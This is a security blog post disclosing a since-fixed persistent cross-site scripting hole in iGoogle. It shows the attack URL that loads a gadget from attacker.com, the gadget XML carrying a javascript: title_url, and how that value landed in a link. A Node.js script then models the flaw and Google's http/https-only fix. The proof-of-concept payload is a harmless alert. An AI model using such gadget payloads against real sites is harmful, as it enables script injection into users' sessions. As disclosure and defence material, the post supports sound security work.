Kos Security: a blog about security.

Hacking Google – Part 1

Vulnerability: Cross Site Scripting

Affects: all browsers.

iGoogle (http://www.google.com/ig) was vulnerable to persistent XSS via untrusted gadgets hosted on offsite domains.

Authentication Status: both unauth and auth


URL used in the attack:
http://www.google.com/ig/adde?moduleurl=attacker.com/payload.xml&source=lpep&mkhp=0

attacker.com/payload.xml:
<ModulePrefs author="Kyle" author_email=""
        description="__MSG_description__" thumbnail="http://www.google.com/images/firefox/sprite2.png"
        screenshot="http://www.google.com/images/firefox/sprite2.png"
        title_url="javascript:alert(document.domain);"  title="[TITLE OF GADGET]" height="165">
        <Require feature="setprefs" />
        <Require feature="views" />
        <Require feature="dynamic-height" />
....
</ModulePrefs>

How it’s reflected on the page:

....
<a id="m_8_url" href="javascript:alert(document.domain);" target="_blank"><span id="m_8_title">[TITLE OF GADGET]</span></a>
....
(The "Hax" string was the title of the gadget, i.e. the link text of the reflected anchor shown above.)

Resolution

This issue was resolved very quickly.
Google now replaces any title_url whose scheme is not http or https with the directory path the gadget file is hosted at.
If the file is hosted at http://attacker.com/path/to/file.xml, the URL becomes http://attacker.com/path/to/.
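As an added example (not Google's code and not from the original post), the following Node.js script models both the sink shown above and the resolution described here: the gadget's title_url is copied straight into an href in the vulnerable rendering, while the fixed rendering keeps only http/https URLs and otherwise substitutes the directory the gadget file is hosted at. The gadget XML, the module URL and the helper names (getModulePrefAttr, sanitizeTitleUrl, renderVulnerable, renderFixed) are constructed for this illustration. Parsing with the WHATWG URL class, rather than a string prefix check, means mixed-case or whitespace-prefixed schemes such as "JavaScript:" normalise before the comparison; the fixed renderer additionally HTML-escapes attribute values, which goes slightly beyond the scheme check the post describes.

```javascript
// Added example: models the iGoogle title_url sink and the described fix.
// Everything below is constructed for illustration, not Google's code.

// Constructed gadget XML mirroring the shape of the payload in the post.
const gadgetXml = `<ModulePrefs author="Kyle" title="Hax"
  title_url="javascript:alert(document.domain);" height="165"></ModulePrefs>`;

// Hypothetical module URL; the post's resolution derives the fallback from it.
const moduleUrl = 'http://attacker.com/path/to/file.xml';

// Minimal attribute extractor for ModulePrefs (illustrative helper; a real
// container would run a proper XML parser over the gadget document).
function getModulePrefAttr(xml, name) {
  const m = xml.match(new RegExp(`\\b${name}="([^"]*)"`));
  return m ? m[1] : null;
}

// Models the fix: anything that is not an absolute http/https URL is replaced
// by the directory containing the gadget file, e.g.
// http://attacker.com/path/to/file.xml -> http://attacker.com/path/to/
function sanitizeTitleUrl(titleUrl, hostedAt) {
  const base = new URL(hostedAt);
  const dirPath = base.pathname.slice(0, base.pathname.lastIndexOf('/') + 1);
  const fallback = `${base.protocol}//${base.host}${dirPath}`;

  let parsed;
  try {
    parsed = new URL(titleUrl); // no base: relative values throw and fall back
  } catch {
    return fallback;
  }
  // URL normalises scheme case and strips leading whitespace, so
  // "JavaScript:" or " javascript:" both arrive here as "javascript:".
  if (parsed.protocol === 'http:' || parsed.protocol === 'https:') {
    return parsed.href;
  }
  return fallback; // javascript:, data:, vbscript:, ... all land here
}

// Escapes the characters that matter inside an HTML attribute or text node.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable rendering: the attacker-controlled title_url lands in href as-is,
// which is exactly the reflected anchor the post shows.
function renderVulnerable(xml, id) {
  const href = getModulePrefAttr(xml, 'title_url') || '';
  const title = getModulePrefAttr(xml, 'title') || '';
  return `<a id="m_${id}_url" href="${href}" target="_blank">` +
         `<span id="m_${id}_title">${title}</span></a>`;
}

// Fixed rendering: scheme allow-list plus attribute escaping.
function renderFixed(xml, id, hostedAt) {
  const href = sanitizeTitleUrl(getModulePrefAttr(xml, 'title_url') || '', hostedAt);
  const title = getModulePrefAttr(xml, 'title') || '';
  return `<a id="m_${id}_url" href="${escapeHtml(href)}" target="_blank">` +
         `<span id="m_${id}_title">${escapeHtml(title)}</span></a>`;
}

console.log('before:', renderVulnerable(gadgetXml, 8));
console.log('after: ', renderFixed(gadgetXml, 8, moduleUrl));
```

Running the script prints the reflected anchor with the javascript: href first, then the same anchor with the href rewritten to http://attacker.com/path/to/.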
